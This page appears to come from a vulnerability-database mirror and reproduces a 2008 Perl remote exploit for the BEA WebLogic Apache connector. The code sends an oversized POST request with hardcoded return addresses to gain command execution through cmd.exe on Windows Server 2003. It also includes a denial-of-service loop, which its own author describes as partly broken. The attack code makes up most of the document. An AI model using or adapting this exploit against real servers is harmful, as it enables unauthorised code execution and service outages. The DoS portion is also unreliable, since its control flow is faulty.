Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit

🗓️ 17 Jul 2008 00:00:00Reported by kcopeType 
zdt
 zdt🔗 0day.today👁 11 Views

Bea Weblogic Apache Connector Code Exec / DoS Exploi

Code
===================================================================
Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
===================================================================

#// Bea Weblogic -- Apache Connector Remote Exploit +-1day
#// Should stack break latest Windows Server 2003 <address space randomization>
#// BIG THANKS TO 
#// "dong-hun you"(Xpl017Elz) in INetCop - for his paper
#// "Title: Advanced exploitation in exec-shield (Fedora Core case study)"
#// His technique works fine against Windows 2003 latest version.
#//
#// The code is broken, since I am chilling out for now
#// SKIDDI BULLETPROOF
#// You may fixup the DoS Code, Windows Code Works on English OSs
#// KingCope -- July/2008

use IO::Socket;
use strict;

$|=1;
my $apacheport = 80;	#// Touch
###
my $wrongusage = 0;
my $dodoshost = 0;

###############################################################################
### Target List Entries |Operating System and Patch Level / Kernel Version|
###############################################################################
my @targets = ();
my @tgtname = ();
print "-" x 80;
$targets[0] = "1 Windows Server 2003 Enterprise Edition SP2 RC1 -- English\n";
$tgtname[0] = $targets[0];
$targets[100] = "2 Denial of Service\n";
$tgtname[100] = $targets[100];

###############################################################################
### Print Of Target List And Usage
###############################################################################
print "\n";

print "Bea Weblogic -- Apache Connector Remote Exploit\n\n";
print "Target List:\n";

foreach my $target (@targets) {	
	print $target;
}
print "\n\n";
print "-" x 80;
print "Usage: perl bea-unlock.pl <hostname or ip> <target>";
print "\n";

printusage:
if ($wrongusage == 1) {	exit; }

################################################################################
### Argument Parsing
################################################################################
my $host = $ARGV[0];
my $target = $ARGV[1];

if (($host == "") || ($target == "")) {
	$wrongusage = 1;
	goto printusage;
}

################################################################################
### Setup Socket
################################################################################
setupsocket:
my $sock = IO::Socket::INET->new(PeerAddr => $host,
                           	     PeerPort => $apacheport,
   	                             Proto    => 'tcp');
if ($dodoshost == 1) {
	goto doshost;	
}
################################################################################
### Select Target
################################################################################
if ($target == 1) {
	print "Exploiting $host -- " . $tgtname[$target-1];
	goto winexpl;
}

if ($target == 2) {
    print "Attacking Host $host -- Denial of Service -- Wait ...\n";
	goto doshost;
}

################################################################################
### Exploitation of Windows Versions
################################################################################
winexpl:
####WORKS [LOOKUP THE HOSTNAME]
my $command = "echo works > c:\\desiredfile.txt";
			 
my $cmds = "cmd.exe /c \"$command\"|";

my $sc = $cmds;

#### STACKBREAKING WITH WINEXEC() ON WINDOWS

my $c = "C" x 97 . pack("L", 0x10013930) x 3 . pack("L", 0x10013930) . pack("L", 0x10013931) . pack("L",0x77EA411E);
my $a = $cmds . "A" x (4000-length($cmds)) . $c;

print $sock "POST /.jsp $a\r\nHost: localhost\r\n\r\n";

while (<$sock>) {	
	print;
}
################################################################################
### Denial of Service Against The Apache Frontend Module For Bea Weblogic
################################################################################
####NEEDS SOME FIXUP
doshost:
$dodoshost = 1;

while(1) {
	$a = "A" x 6000;
	goto setupsocket;
	print $sock "POST /.jsp $a\r\n\r\nHost: localhost\r\n\r\n";
	while(read($sock,$_,100)) {
		my $dosagain = 0;
		
		if ($dosagain eq 1) {
				"Server is down now\n";
				exit;
		}
		
		if ($_ =~ /Server/) {
			print ".";
			$dosagain = 1;
			next;
		}
	}
}



#  0day.today [2018-03-12]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Jul 2008 00:00Current
7.1High risk
Vulners AI Score7.1
bea weblogicapache connectorcode execdenial of serviceremote exploitwindows server 2003englishio socketperlargument parsingsetup socketexploitationstackbreakingwinexecapache frontend module
11